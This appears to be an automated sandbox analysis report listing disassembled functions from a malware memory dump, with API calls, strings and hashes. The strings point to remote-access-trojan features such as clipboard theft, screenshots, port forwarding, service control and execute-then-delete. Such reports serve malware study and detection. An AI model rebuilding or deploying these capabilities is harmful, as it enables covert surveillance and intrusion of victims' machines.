                                                                                                                                  • Opcode Fuzzy Hash: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
                                                                                                                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                                                                  Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                  • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                                                  • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                                                  Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                                                  • GetFileType.KERNEL32 ref: 00455D82
                                                                                                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                  • String ID: H
                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                                                  Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID: \&G$\&G$`&G
                                                                                                                                  • API String ID: 269201875-253610517
                                                                                                                                  • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                                                  • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                                                  Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 65535$udp
                                                                                                                                  • API String ID: 0-1267037602
                                                                                                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                                                  Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                                                  • _free.LIBCMT ref: 0043A9C3
                                                                                                                                  • _free.LIBCMT ref: 0043A9CA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2441525078-0
                                                                                                                                  • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                                                  • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                                                  Function 0041A045 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 176sleeptimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                  • String ID: 8)3$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                  • API String ID: 489098229-1692321232
                                                                                                                                  • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                                                                  • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                                                                  Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                  • GetMessageA.USER32 ref: 0040556F
                                                                                                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                  • API String ID: 2956720200-749203953
                                                                                                                                  • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                                                                  • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                                                                  Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                  • String ID: 0VG$0VG$<$@$Temp
                                                                                                                                  • API String ID: 1704390241-2575729100
                                                                                                                                  • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                                                                  • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                                                  Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenClipboard.USER32 ref: 0041697C
                                                                                                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                                                                  • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                  • String ID: !D@
                                                                                                                                  • API String ID: 2172192267-604454484
                                                                                                                                  • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                                                  • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                                  Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                  • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                                  • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                                  Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 004481B5
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 004481C1
                                                                                                                                  • _free.LIBCMT ref: 004481CC
                                                                                                                                  • _free.LIBCMT ref: 004481D7
                                                                                                                                  • _free.LIBCMT ref: 004481E2
                                                                                                                                  • _free.LIBCMT ref: 004481ED
                                                                                                                                  • _free.LIBCMT ref: 004481F8
                                                                                                                                  • _free.LIBCMT ref: 00448203
                                                                                                                                  • _free.LIBCMT ref: 0044820E
                                                                                                                                  • _free.LIBCMT ref: 0044821C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                                  Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                                                                  • _free.LIBCMT ref: 10005A22
                                                                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                  • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                  • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                  • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                  Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Eventinet_ntoa
                                                                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                  • API String ID: 3578746661-3604713145
                                                                                                                                  • Opcode ID: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                                                                                                                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                                                                  • Opcode Fuzzy Hash: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                                                                                                                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                                                                  Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DecodePointer
                                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                                                  • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                  • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                                                                  • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                  • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                                                                  Function 10009492 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                  • __fassign.LIBCMT ref: 1000954F
                                                                                                                                  • __fassign.LIBCMT ref: 1000956A
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 1324828854-2459865102
                                                                                                                                  • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                  • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                  • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                  • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
